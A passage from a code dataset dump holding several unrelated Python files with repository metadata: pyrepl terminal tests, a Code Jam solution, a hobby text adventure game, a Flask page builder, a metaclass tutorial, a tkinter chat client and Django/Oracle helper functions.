char)\n\n def test_wrapping(self):\n reader = self.make_example_reader()\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"foo$01234\\\\\", \"567890123\\\\\", \"456789\"])\n self.check_output(reader, lines)\n\n def test_wrapping_without_backslashes(self):\n reader = self.make_example_reader()\n reader.wrap_marker = \"\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"foo$012345\", \"6789012345\", \"6789\"])\n self.check_output(reader, lines)\n\n def test_wrapping_long_prompts(self):\n reader = self.make_example_reader()\n reader.wrap_marker = \"\"\n reader._ps1 = \"0123456789foo$\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"0123456789\",\n \"foo$012345\", \"6789012345\", \"6789\"])\n self.check_output(reader, lines)\n\n def test_wrapping_status_message(self):\n reader = self.make_example_reader()\n reader.msg = \"status1status2status3status4\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"foo$01234\\\\\", \"567890123\\\\\", \"456789\",\n \"status1st\\\\\", \"atus2stat\\\\\", \"us3status\\\\\", \"4\"])\n self.check_output(reader, lines)\n\n reader.msg_at_bottom = False\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"status1st\\\\\", \"atus2stat\\\\\", \"us3status\\\\\", \"4\",\n \"foo$01234\\\\\", \"567890123\\\\\", \"456789\"])\n self.check_output(reader, lines)\n\n # There should be no empty line when the message exactly fills\n # the last line.\n reader.msg = \"status1status2status3status\"\n lines = reader.calc_screen()\n self.assertEquals(lines,\n [\"status1st\\\\\", \"atus2stat\\\\\", \"us3status\",\n \"foo$01234\\\\\", \"567890123\\\\\", \"456789\"])\n self.check_output(reader, lines)\n\n\nclass VTEConsole(pyrepl.unix_console.UnixConsole):\n\n def __init__(self, terminal):\n self._terminal = terminal\n pyrepl.unix_console.UnixConsole.__init__(self, f_in=None, term=\"xterm\")\n\n # TODO: Don't use __ attributes in UnixConsole\n def flushoutput(self):\n for text, iscode in self._UnixConsole__buffer:\n self._terminal.feed(text.encode(self.encoding))\n del self._UnixConsole__buffer[:]\n\n def _update_size(self):\n pass\n\n\ndef get_vte_text(vte_terminal):\n # VTE updates the terminal in the event loop after a\n # non-configurable timeout, so we have to work around that.\n time.sleep(0.05)\n while gobject.main_context_default().iteration(False):\n pass\n return vte_terminal.get_text(lambda *args: True)\n\n\nclass TestUnixConsole(unittest.TestCase):\n\n def test_soft_newlines(self):\n terminal = vte.Terminal()\n terminal.set_size(10, 10)\n console = VTEConsole(terminal)\n console.width = 10\n console.height = 10\n console.prepare()\n\n # Check that a soft newline occurs.\n console.refresh([\"0123456789\",\n \"abcdefg\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"0123456789abcdefg\" + \"\\n\" * 9)\n\n # Check switching from soft newline to hard newline.\n # The chars \"89\" should disappear from the display.\n console.refresh([\"01234567\",\n \"abcdefg\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"01234567\\nabcdefg\" + \"\\n\" * 9)\n\n # Test shortening the last line.\n console.refresh([\"0123456789\",\n \"abcd\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"0123456789abcd\" + \"\\n\" * 9)\n\n def test_soft_newlines_positioning(self):\n terminal = vte.Terminal()\n terminal.set_size(10, 10)\n console = VTEConsole(terminal)\n console.width = 10\n console.height = 10\n console.prepare()\n # Check that positioning is correct when starting from the\n # middle of the 
terminal.\n terminal.feed(\"\\n\\n\")\n\n console.refresh([\"012345678\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\\n012345678\" + \"\\n\" * 8)\n self.assertEquals(terminal.get_cursor_position(), (0, 2))\n\n # pyrepl's Reader produces empty lines.\n console.refresh([\"0123456789\", \"\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\\n0123456789\" + \"\\n\" * 8)\n self.assertEquals(terminal.get_cursor_position(), (0, 2))\n\n console.refresh([\"0123456789\", \"a\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\\n0123456789a\" + \"\\n\" * 7)\n self.assertEquals(terminal.get_cursor_position(), (0, 2))\n\n def test_bottom_of_screen(self):\n # We should be able to write in the bottom line of the screen.\n terminal = vte.Terminal()\n terminal.set_size(10, 10)\n console = VTEConsole(terminal)\n console.width = 10\n console.height = 10\n console.prepare()\n terminal.feed(\"\\n\" * 20)\n console.refresh([\"hello\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\" * 9 + \"hello\\n\")\n console.refresh([\"hello\", \"\"], (0, 0))\n self.assertEquals(get_vte_text(terminal),\n \"\\n\" * 8 + \"hello\\n\\n\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mseaborn/pyrepl","sub_path":"test_wrapping.py","file_name":"test_wrapping.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23600921091","text":"fileName = \"A-large\"\r\n\r\ninputFile = open( fileName + \".in\", \"r\" )\r\noutputFile = open( fileName + \".out\", \"w\" )\r\n\r\nnumCases = int(inputFile.readline())\r\n\r\nfor caseNumber in range(1, numCases + 1):\r\n\r\n input_s = inputFile.readline()\r\n \r\n numSnappers = int(input_s.split()[0])\r\n numSnaps = int(input_s.split()[1])\r\n \r\n mask = (2**numSnappers) - 1\r\n \r\n if mask == numSnaps & mask:\r\n answer = \"ON\"\r\n else:\r\n answer = \"OFF\"\r\n\r\n # Output the results\r\n outputFile.write( \"Case #%d: %s\\n\" % (caseNumber, answer) )\r\n\r\n# Close the streams\r\ninputFile.close()\r\noutputFile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_53/456.py","file_name":"456.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26012893453","text":"from sys import exit\nfrom random import randint\nfrom textwrap import dedent\n\n# this creats an object that contains the state on the game\nclass Player(object):\n def __init__(self):\n self.hunger = 50\n self.thirst = 50\n self.food_raw = 0\n self.food_cooked = 5\n self.wood = 0\n self.location = 'string'\n self.mine_equip = False\n self.bow = False\n self.diamonds = 0\n self.coal = 0\n self.gold = 10\n self.canteen = 0\n self.water = 0\nclass Admin(object):\n def __init__(self):\n self.hunger = 100\n self.thirst = 50\n self.food_raw = 100\n self.food_cooked = 100\n self.wood = 100\n self.location = 'string'\n self.mine_equip = False\n self.bow = False\n self.diamonds = 100\n self.coal = 100\n self.gold = 10000000\n self.canteen = 1000\n self.water = 1000\n# takes the string and uses it to get a class and call its enter method\nclass Engine(object):\n def __init__(self, scene_map):\n self.scene_map = scene_map\n\n def play(self):\n current_scene = self.scene_map.opening_scene()\n last_scene = self.scene_map.next_scene('finale')\n while current_scene != last_scene:\n next_scene_name = current_scene.enter()\n 
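# each scene's enter() returns the NAME of the next scene; Map.next_scene (defined below) resolves that name to a Scene object\n 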
current_scene = self.scene_map.next_scene(next_scene_name)\n current_scene.enter()\n\n# this is the overarching scene that contains the generic commands\nclass Scene(object):\n def enter(self):\n exit(1)\n# lets the player eat\n def eat(self):\n if player.food_cooked > 0:\n if player.hunger < 200: # eat only while below the cap; the original comparison was inverted, so eating never happened\n print(\"you eat food\")\n player.food_cooked -= 1\n player.hunger += 10\n else:\n print('you are full')\n# displays the current status of the player\n def stats(self):\n print(dedent(f\"\"\"\n gold: {player.gold}\n Hunger:{player.hunger}\n Thirst:{player.thirst}\n Food:cooked:{player.food_cooked} raw:{player.food_raw}\n Wood:{player.wood}\n diamonds: {player.diamonds}\n coal:{player.coal}\n \"\"\"))\n if player.canteen == True:\n print(f'Canteen: {player.water} / {player.canteen}')\n\n# this is a work in progress\nclass Battle(Scene):\n pass\n\n# start screen\nclass Game_start(Scene):\n def enter(self):\n print(dedent(\"\"\"\n Exitio Magicae\n The game of magic death\n start\n info\n quit\n \"\"\"))\n chose = input()\n if str.lower(chose) == 'start':\n print('Game Start')\n return 'intro'\n elif str.lower(chose) == 'quit':\n print('bye')\n exit(1)\n elif str.lower(chose) == 'info':\n print(dedent(\"\"\"\n you can type these commands at any time:\n eat\n stats\n quit\n\n \"\"\"))\n return 'game_start'\n# intro to the world and maybe a combat tutorial\nclass Intro(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n :o-|-[\n You awaken to a sound of crumpling leaves.\n in front of you is a man wearing a top hat.\n \"Hello there my boy, I'm sorry to awaken you, but this is not a charity house\"\n you realise that you fell asleep outside the store.\n you apologise to the man and stand up only to get smashed into the wall by a skeleton\n what will you do?\n \"\"\"))\n if choice == 'fight':\n print('sorry this option is not available right now so you just die')\n return 'death'\n elif choice == 'skip':\n print(dedent(\"\"\"\n you quickly convince the skeletons\n that you are so strong they needn't bother\n The mayor then gifts you a cabin in the woods nearby as thanks\n you decide to rest for a bit by the magic fire outside\"\"\"))\n return 'campfire'\n else:\n print('wot')\n return 'intro'\n# base of the game in between the major points of interest\nclass Campfire(Scene):\n def enter(self):\n choice = input(dedent(f\"\"\"\n This is the campfire; it is lit by a blue ethereal flame.\n you see paths to the east, north and west.\n there is a cabin behind you\n \"\"\"))\n\n if choice == 'east' or choice == 'East':\n print('you take the eastern road')\n player.hunger -= 5\n player.thirst -= 10\n return 'east'\n elif choice == 'north' or choice == 'North':\n print('you take the northern trail')\n player.hunger -= 5\n player.thirst -= 5\n return 'north'\n elif choice == 'West' or choice == 'west':\n print('you take the western path')\n player.hunger -= 5\n player.thirst -= 5\n return 'west'\n elif choice == 'cabin' or choice == 'Cabin':\n print('you go to the cabin')\n return 'cabin'\n elif choice == 'cook' or choice == 'Cook':\n if player.food_raw > 0:\n player.food_raw -= 1\n player.food_cooked += 1\n else:\n print(\"you do not have any raw food\")\n return 'campfire'\n elif choice == 'stats' or choice == 'check':\n self.stats()\n return 'campfire'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'campfire'\n elif choice == 'quit':\n exit(1)\n else:\n print(\"you don't know how to do that\")\n return 'campfire'\n\n# you can cook and rest here; resting does nothing for now\nclass Cabin(Scene):\n def enter(self):\n choice = 
input(dedent(f\"\"\"\n You enter the cabin. It's old and there is not much inside.\n There is a bed and a fireplace\n \"\"\"))\n if str.lower(choice) == 'cook':\n if player.food_raw > 0:\n player.food_raw -= 1\n player.food_cooked += 1\n else:\n print(\"you do not have any raw food\")\n return 'cabin'\n elif choice == 'rest' or choice == 'Rest':\n print(\"you sleep\")\n return 'cabin'\n elif choice == 'exit' or choice == 'leaves':\n print('you leave the cabin')\n return 'campfire'\n elif choice == 'stats' or choice == 'check':\n self.stats()\n return 'cabin'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'cabin'\n elif choice == 'quit':\n exit(1)\n else:\n print(\"no that would be stupid\")\n return 'cabin'\n# hunting and mining area\nclass North(Scene):\n def enter(self):\n print(dedent(f\"\"\"\n You go down the trail. It goes on for a while.\n eventually you arrive at a small mining camp.\n the woods around here look full of deer\n \"\"\"))\n if player.mine_equip == False:\n print('There is a pickaxe and a shovel')\n choice = input()\n if str.lower(choice) == 'hunt':\n player.hunger -= 5\n player.thirst -= 5\n if player.bow == True:\n print('You enter the woods with your bow and begin hunting')\n pnumber = int(input('pick a number 1 through 4')) # input() returns a string; convert it so the comparison with randint() can succeed\n random = randint(1, 4)\n fnumber = randint(1, 3)\n if pnumber == random:\n player.food_raw += fnumber\n print(f'you were successful, you gain {fnumber} food')\n if pnumber != random:\n print('you fail to catch anything')\n return 'north'\n else:\n print(\"you don't have a bow and can't hunt.\")\n return 'north'\n elif str.lower(choice) == 'mine':\n if player.mine_equip == True:\n print('You venture into the mountain caves and begin to mine')\n mnumber = randint(1, 20)\n if mnumber == 20:\n player.hunger -= 5\n player.thirst -= 5\n print('You found a diamond. Congrats!')\n player.diamonds += 1\n\n elif mnumber > 5:\n player.hunger -= 5\n player.thirst -= 5\n print('You got some coal. Neat!')\n player.coal += 1\n\n else:\n player.hunger -= 10\n player.thirst -= 10\n print('you found some rocks. be mad')\n else:\n print('you do not have a pick')\n return 'north'\n elif str.lower(choice) == 'pick up' or str.lower(choice) == 'pick up pickaxe':\n if player.mine_equip == False:\n print('you pick up the shovel and pickaxe and put them on your back')\n player.mine_equip = True\n return 'north'\n else:\n print('you already took them')\n return 'north'\n elif str.lower(choice) == 'back' or str.lower(choice) == 'leave':\n print('you return to your fire')\n return 'campfire'\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'north'\n else:\n print('not an option')\n return 'north'\n\n# work in progress\nclass West(Scene):\n def enter(self):\n print(\"no you can't go here... yet, I'm working on it\")\n return 'campfire'\n\n# town with branching paths to the buildings\nclass East(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n You enter the town. 
You see some buildings.\n a blacksmith\n a market\n a well\n \"\"\"))\n if str.lower(choice) == 'blacksmith':\n print('you go to the blacksmith')\n return 'blacksmith'\n elif str.lower(choice) == 'store' or str.lower(choice) == 'market':\n print('you go to the market')\n return 'market'\n elif str.lower(choice) == 'well' or str.lower(choice) == 'go to well':\n print('you walk to the well')\n return 'well'\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'east'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'east'\n elif str.lower(choice) == 'quit':\n exit(1)\n\n else:\n print(\"that's not a great thing to do\")\n return 'east'\n# the well where the player can fill a canteen or drink water\nclass Well(Scene):\n def enter(self):\n print('you arrive at the well. what will you do')\n fill = input()\n if str.lower(fill) == 'drink':\n if player.thirst < 100:\n print('you drink some water')\n while player.thirst < 100:\n player.thirst += 1\n return 'well'\n elif str.lower(fill) == 'fill':\n if player.canteen > 0:\n print('you use the well to fill your canteen')\n while player.water < player.canteen:\n player.water += 1\n return 'well'\n else:\n print(\"you don't own a canteen\")\n return 'well'\n elif str.lower(fill) == 'leave':\n print('you go back to town square')\n return 'east'\n else:\n print('either drink, fill or just leave')\n return 'well'\n\n# place to buy stuff\nclass Market(Scene):\n def enter(self):\n choice = input(dedent(\"\"\"\n you enter the market and go to a stall\n he has some items out for sale\n an apple(1 cooked food): 5g\n Meat(3 cooked food): 10g\n health potion: 1000000g\n \"\"\"))\n if str.lower(choice) == 'apple' or str.lower(choice) == 'buy apple':\n if player.gold >= 5:\n player.gold -= 5\n player.food_cooked += 1\n print('you buy an apple')\n else:\n print('you need more gold')\n return 'market'\n elif str.lower(choice) == 'meat' or str.lower(choice) == 'buy meat':\n if player.gold >= 10:\n player.gold -= 10\n player.food_cooked += 3\n print(\"you buy some meat\")\n else:\n print('you need more gold')\n return 'market'\n elif str.lower(choice) == 'health potion' or str.lower(choice) == 'buy health potion':\n if player.gold >= 10:\n player.gold -= 10\n player.food_cooked += 100000000000\n print(\"this doesn't do anything yet so please enjoy the infinite food\")\n else:\n print('no')\n return 'market'\n elif str.lower(choice) == 'leave':\n print('you go back to the square')\n return 'east'\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'east'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'east'\n elif str.lower(choice) == 'quit':\n exit(1)\n else:\n print(\"no, that's not right\")\n return 'east'\n\n# this is where tools are bought and minerals are sold\nclass Blacksmith(Scene):\n def enter(self):\n choice = input(dedent(f\"\"\"\n you enter the blacksmith.\n As you enter, the blacksmith smiles warmly and asks\n \"what can I do you for\"\n he lays out his wares with the prices attached\n canteen upgrade(capacity {player.canteen + 10}):100g\n Bow(lets you hunt): 300g\n it also has a note that says he will buy any gems or coal off you\n \"\"\"))\n if str.lower(choice) == 'canteen' or str.lower(choice) == \"buy canteen\":\n if player.gold >= 100:\n player.gold -= 100\n player.canteen += 10\n print(dedent(\"\"\"you buy an upgrade to your canteen.\n It's the same size somehow and you have no clue how on earth that works.\n The blacksmith just winks at you\"\"\"))\n else:\n print('not enough money')\n return 'blacksmith' # stay at the blacksmith; 'market' here looked like a copy-paste slip\n elif str.lower(choice) 
== 'bow' or str.lower(choice) == \"buy bow\":\n if player.bow == True:\n print('you already have one')\n elif player.gold >= 300:\n player.gold -= 300\n player.bow = True\n print('you now have a bow. Now go hunt.')\n else:\n print('not enough money')\n return 'blacksmith' # stay at the blacksmith; 'market' here looked like a copy-paste slip\n elif str.lower(choice) == 'sell':\n print('what would you like to sell')\n minaral = input()\n if str.lower(minaral) == 'diamond' or str.lower(minaral) == 'diamonds' :\n if player.diamonds > 0:\n player.diamonds -= 1\n player.gold += 100\n print('you sell a diamond ')\n else:\n print('YOU HAVE NOT ENOUGH MINERALS')\n\n elif str.lower(minaral) == 'coal':\n if player.coal > 0:\n player.coal -= 1\n player.gold += 10\n print('you sell coal for 10 gold')\n else:\n print('YOU HAVE NOT ENOUGH MINERALS')\n else:\n print(\"that's not a mineral\")\n return 'blacksmith'\n\n elif str.lower(choice) == 'stats':\n self.stats()\n return 'east'\n elif str.lower(choice) == 'eat':\n self.eat()\n return 'east'\n elif str.lower(choice) == 'quit':\n exit(1)\n else:\n print(\"no, that's not right\")\n return 'east'\n\nclass Finale(Scene):\n pass\n\n# this one doesn't come up much yet\nclass Death(Scene):\n def enter(self):\n global player # rebind the module-level player; without this the assignment below only made a local variable\n choice = input(dedent(\"\"\"\n you have died, not a big surprise\n Play Again?\n \"\"\"))\n if str.lower(choice) == 'yes' or str.lower(choice) == 'play again':\n player = Player()\n return 'intro' # 'into' was a typo; the scene map key is 'intro'\n if str.lower(choice) == 'no' or str.lower(choice) == 'quit':\n quit(1)\n else:\n print('what')\n return 'death'\n\n# this creates the scene map\nclass Map(object):\n # this is a list of all the scenes\n scenes = {\n 'game_start': Game_start(),\n 'intro': Intro(),\n 'campfire': Campfire(),\n 'cabin': Cabin(),\n 'north': North(),\n 'west': West(),\n 'east': East(),\n 'blacksmith': Blacksmith(),\n 'market': Market(),\n 'well': Well(),\n 'death': Death(),\n 'finale': Finale()\n }\n # this creates the object start scenes\n def __init__(self, start_scene):\n self.start_scene = start_scene\n # this creates next_scene for use\n def next_scene(self, scene_name):\n val = Map.scenes.get(scene_name)\n return val\n\n def opening_scene(self):\n return self.next_scene(self.start_scene)\n# I know this looks the same as the books but I tried to make one and it just so happened to come out the same\n\nplayer = Player()\na_map = Map('game_start')\na_game = Engine(a_map)\na_game.play()\n","repo_name":"blong191/Exitio_Magicae","sub_path":"repetative_death.py","file_name":"repetative_death.py","file_ext":"py","file_size_in_byte":17323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11724299275","text":"import context\nimport lib.widgets.htmlwidgets as htmlwidgets\nimport css as css\nimport lib.ajax.ajax_aux as ajax_aux\n\ndef page_head():\n return \"\"\"\n\"\"\" + \\\n htmlwidgets.head(\"jQuery Example\", css=css.global_css()) + \\\n\"\"\"\n\n\"\"\"\n\ndef index_ajax_meta():\n return {\n 'route': '/_add_numbers',\n 'id_action': 'a#calculate',\n 'id_result': 'result',\n 'id_data': ['a', 'b'],\n 'id_result_hist': 'history',\n 'id_result_uses': 'nuses',\n 'id_rgb': 'rgb',\n 'id_calc_history_table': 'histtbl'\n }\n\ndef index_page():\n meta = index_ajax_meta()\n return page_head() +\\\n ajax_aux.get_ajax_index(meta) + \\\n \"\"+\\\n htmlwidgets.h1(\"jQuery Example\") + \\\n ajax_aux.numeric_boxes(meta['id_data']) + \" = \" + \\\n htmlwidgets.htmloutput(meta['id_result']) + \\\n ajax_aux.link(\"#\", \"calculate\", \"DO IT\") + \\\n htmlwidgets.htmlvaluebox(\"N uses\", meta['id_result_uses']) + \\\n 
htmlwidgets.div('', options={'id':'divtochange'},style={'height': '50px', 'width': '50px', 'background-color':'blue'})+\\\n htmlwidgets.h1(\"Session history\") + \\\n htmlwidgets.datatable(['a','b'],[],options={'id':meta['id_result_hist']})+\\\n htmlwidgets.htmloutput(meta['id_calc_history_table']) + \\\n \"\"\n","repo_name":"jpoffline/py-dev","sub_path":"webserver/app/flasksite/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4489154232","text":"#tiny class\n\n# dynamic creation with type()\n# the biggest difference between dynamic and static languages is that functions and classes are not defined at compile time, but created dynamically at runtime.\n\nclass Hello(object):\n\tdef hi(self,name = 'scott'):\n\t\tprint('hello , %s.'%name)\n\t\t\n# the result is that a Hello class object is created dynamically\nh = Hello()\nh.hi()\nprint(type(Hello))\nprint(type(h))\n# the type() function returns the type of a type or variable; Hello is a class, so its\n# type is type, while h is an instance, whose type is the class Hello.\n# class definitions are created dynamically at runtime, and the way to create a class is the type() function.\n# type() can both return the type of an object and create new types; for example,\n\n# we can create the Hello class through type() without a class Hello(object)... definition:\ndef fn(self,name = 'scotte'):\n\tprint('adw %s' % name)\n\nhey = type('hey',(object,),dict(hello = fn))# create the hey class\nh = hey()\nh.hello()\nprint(type(hey))\nprint(type(h))\n\n\n\n\n\n\n# metaclass literally means 'the class of a class'; simply put: classes must be created from a metaclass, so: first define the metaclass, then create the class.\n# chained together: define the metaclass first, then classes can be created, and finally instances\n# a metaclass lets you create or modify classes. In other words, you can view classes as \"instances\" created by the metaclass.\n\n# a metaclass is a template for classes, so it must derive from the `type` type:\nclass ListMetaclass(type):\n\tdef __new__(cls,name,bases,attrs):\n\t\tattrs['add'] = lambda self ,value:self.append(value)\n\t\treturn type.__new__(cls,name,bases,attrs)\n\n\n# when defining the class, also instruct Python to customize it with ListMetaclass by passing the metaclass keyword argument:\nclass MyList(list,metaclass = ListMetaclass):\n\tpass\n\nprint(type(MyList))\nprint(type(MyList()))\n\n# ORM stands for \"Object Relational Mapping\": a row of a relational\n# database is mapped to an object, i.e. one class corresponds to one table, which makes code simpler, with no need for raw SQL statements.\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nikelily/PyLearn-Codes","sub_path":"160914/tinyClass.py","file_name":"tinyClass.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74368487555","text":"from tkinter import *\nimport socket\nimport threading\nfrom client import ClientEntity\nimport logging\n\t\t\nclass WidgetLogger(logging.Handler):\n\tdef __init__(self, widget):\n\t\tlogging.Handler.__init__(self)\n\t\tself.widget = widget\n\n\tdef emit(self, record):\n\t\tself.widget.insert(INSERT, record + '\\n')\n\t\t\nclass ClientGUI:\n\tdef __init__(self):\n\t\t\n\t\tself.main_gui = Tk()\n\t\tself.text_host = None\n\t\tself.text_port = None\n\t\tself.text_user = None\n\t\tself.btn_connect = None\n\t\tself.btn_send = None\n\t\tself.btn_disconnect = None\n\t\tself.text_message = None\n\t\tself.text_receiver = None\n\t\tself.client_entity = None\n\t\tself.text_recv = None\n\t\tself.wd = None\n\t\t\n\t\tself.init_component()\n\t\t\n\tdef start(self):\n\t\tself.main_gui.mainloop()\n\t\t\n\tdef init_component(self):\n\t\tself.main_gui.minsize(width=500, height=450)\n\t\tself.main_gui.resizable(width=False, height=False)\n\n\t\tself.text_host = Text(self.main_gui, width=20, height=1)\n\t\tself.text_host.insert(INSERT, \"127.0.0.1\")\n\t\tself.text_host.grid(row=0, column=0)\n\n\t\tself.text_port = Text(self.main_gui, width=20, height=1)\n\t\tself.text_port.insert(INSERT, \"9000\")\n\t\tself.text_port.grid(row=0, column=1)\n\n\t\tself.text_user = Text(self.main_gui, width=20, height=1)\n\t\tself.text_user.insert(INSERT, 
\"username1\")\n\t\tself.text_user.grid(row=1, column=0)\n\n\t\tself.btn_connect = Button(self.main_gui, text=\"connect\", width=20, height=1, command=self.connect_callback)\n\t\tself.btn_connect.grid(row=2, column=0)\n\n\t\tself.text_message = Text(self.main_gui, width=40, height=1)\n\t\tself.text_message.grid(row=3, column=0, columnspan=2, rowspan=2)\n\t\t\n\t\tself.text_receiver = Text(self.main_gui, width=40, height=1)\n\t\tself.text_receiver.grid(row=5, column=0, columnspan=2, rowspan=2)\n\n\t\tself.btn_send = Button(self.main_gui, text=\"send\", width=10, height=1, command=self.send_callback)\n\t\tself.btn_send.grid(row=5, column=2)\n\n\t\tself.text_recv = Text(self.main_gui, width=40, height=20)\n\t\tself.text_recv.grid(row=7, column=0, columnspan=2, rowspan=10)\n\t\t\n\t\tself.btn_disconnect = Button(self.main_gui, text=\"disc\", width=10, height=1, command=self.disconnect_callback)\n\t\tself.btn_disconnect.grid(row=20, column=0)\n\t\t\n\t\tself.wd = WidgetLogger(self.text_recv)\n\t\t\n\t\tself.text_recv.config(state=DISABLED)\n\t\tself.text_host.config(state=NORMAL)\n\t\tself.text_port.config(state=NORMAL)\n\t\tself.text_user.config(state=NORMAL)\n\t\tself.text_message.config(state=DISABLED)\n\t\t\n\tdef connect_callback(self):\n\t\ttry:\n\t\t\thost = self.text_host.get(\"1.0\", END)\n\t\t\tport = self.text_port.get(\"1.0\", END)\n\t\t\tuser = self.text_user.get(\"1.0\", END)\n\t\t\t\n\t\t\tself.client_entity = ClientEntity(user, gui=self)\n\t\t\tself.client_entity.connReq(host, int(port))\n\t\t\tself.client_entity.connResp()\n\t\t\tself.client_entity.greet()\n\t\t\tthreading.Thread(target=self.client_entity.run).start()\n\t\t\t\n\t\t\tself.text_host.config(state=DISABLED)\n\t\t\tself.text_port.config(state=DISABLED)\n\t\t\tself.text_user.config(state=DISABLED)\n\t\t\tself.text_message.config(state=NORMAL)\n\t\t\tself.text_recv.config(state=DISABLED)\n\t\t\tself.text_receiver.config(state=NORMAL)\n\t\t\t\n\t\t\tself.btn_connect.config(state=DISABLED)\n\t\t\tself.btn_disconnect.config(state=NORMAL)\n\t\t\t\n\t\texcept socket.gaierror:\n\t\t\tself.append_text('connection refused')\n\t\texcept ConnectionRefusedError:\n\t\t\tself.append_text('connection refused')\n\t\texcept OSError:\n\t\t\tself.append_text('unreachable host. 
Please review your connection')\n\t\t\t\n\tdef disconnect_callback(self):\n\t\tself.client_entity.disconnReq()\n\t\tself.btn_connect.config(state=NORMAL)\n\t\tself.text_recv.config(state=DISABLED)\n\t\tself.text_host.config(state=NORMAL)\n\t\tself.text_port.config(state=NORMAL)\n\t\tself.text_user.config(state=NORMAL)\n\t\tself.text_message.config(state=DISABLED)\n\t\t\n\tdef send_callback(self):\n\t\t# the recipient comes from text_receiver, the message body from text_message\n\t\treceiver = self.text_receiver.get(\"1.0\", END)\n\t\tmessage_str = self.text_message.get(\"1.0\", END)\n\t\t\n\t\tself.client_entity.TCPDataSend(receiver, message_str)\n\t\tself.client_entity.TCPDataResp()\n\t\t\n\tdef append_text(self, message):\n\t\t\n\t\tself.text_recv.config(state=NORMAL)\n\t\tself.wd.emit(message)\n\t\tself.text_message.focus_set()\n\t\tself.text_recv.config(state=DISABLED)\n","repo_name":"zaldoarigi/fap-protocol","sub_path":"client/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25875840645","text":"from django.db import models\nfrom django.db import connection\nimport cx_Oracle\n\n#------------------------Order functions-----------------------\ndef AgregarOrdenCliente(idMesero,idCliente,totalCarritoCliente): \n    django_cursor = connection.cursor()\n    cursor = django_cursor.connection.cursor()\n    v_id = cursor.var(cx_Oracle.NUMBER)\n    v_Salida = cursor.var(cx_Oracle.NUMBER)\n    cursor.callproc(\"sp_Agregar_OrdenCliente\", [idMesero,idCliente,totalCarritoCliente,1,v_id,v_Salida]) \n    return v_Salida.getvalue(),v_id.getvalue()\n\n#------------------------Table detail functions-----------------------\ndef listarMeserosClienteIonic(v_idcliente):\n    django_cursor = connection.cursor()\n    cursor = django_cursor.connection.cursor()\n    out_cursor = django_cursor.connection.cursor()\n\n    cursor.callproc(\"sp_listar_MeserosClienteIonic\", [v_idcliente,out_cursor])\n\n    lista = []\n    datos = \"\"\n    for fila in out_cursor:\n        datos = crearJsonMeseros(fila[0],fila[1],fila[2],fila[3],fila[4],fila[5],fila[6],fila[7])\n        lista.append(datos)\n    \n    return lista\n\ndef listarOrdenesClientesIonic(v_idcliente):\n    django_cursor = connection.cursor()\n    cursor = django_cursor.connection.cursor()\n    out_cursor = django_cursor.connection.cursor()\n\n    cursor.callproc(\"sp_listar_OrdenesClientesIonic\", [v_idcliente,out_cursor])\n\n    lista = []\n    datos = \"\"\n    for fila in out_cursor:\n        datos = crearJsonClientes(fila[0],fila[1],fila[2],fila[3],fila[4],fila[5],fila[6],fila[7],fila[8],fila[9])\n        lista.append(datos)\n    return lista\n\n\ndef crearJsonClientes(ORDECLIENTID,CLIENT_CLIENTID,WAITER_WAITERID,MENUID,QUIANTITY,TOTAL,ORDERCLIENTTOTAL,NAME,STATEORDERSTATE,STATEORDERCLIENT):\n    data = {\n        \"ORDECLIENTID\" :ORDECLIENTID,\n        \"CLIENT_CLIENTID\" :CLIENT_CLIENTID,\n        \"WAITER_WAITERID\" :WAITER_WAITERID,\n        \"MENUID\" :MENUID,\n        \"QUIANTITY\" :QUIANTITY,\n        \"TOTAL\" : TOTAL,\n        \"ORDERCLIENTTOTAL\" : ORDERCLIENTTOTAL,\n        \"NAME\" : NAME,\n        \"STATEORDERSTATE\" : STATEORDERSTATE,\n        \"STATEORDERCLIENT\" : STATEORDERCLIENT\n    }\n    return data\n\ndef crearJsonMeseros(WAITERID,CLIENTID,NAMECLIENT,NAMEWAITER,LASTNAMEWAITER,ESTADO_CLIENTE,ESTADO_ORDENCLIENTE,ESTADO_MESERO):\n    data = {\n        \"WAITERID\" : WAITERID,\n        \"CLIENTID\" : CLIENTID,\n        \"NAMECLIENT\" : NAMECLIENT,\n        \"NAMEWAITER\" : NAMEWAITER,\n        \"LASTNAMEWAITER\" : LASTNAMEWAITER,\n        \"ESTADO_CLIENTE\" : ESTADO_CLIENTE,\n        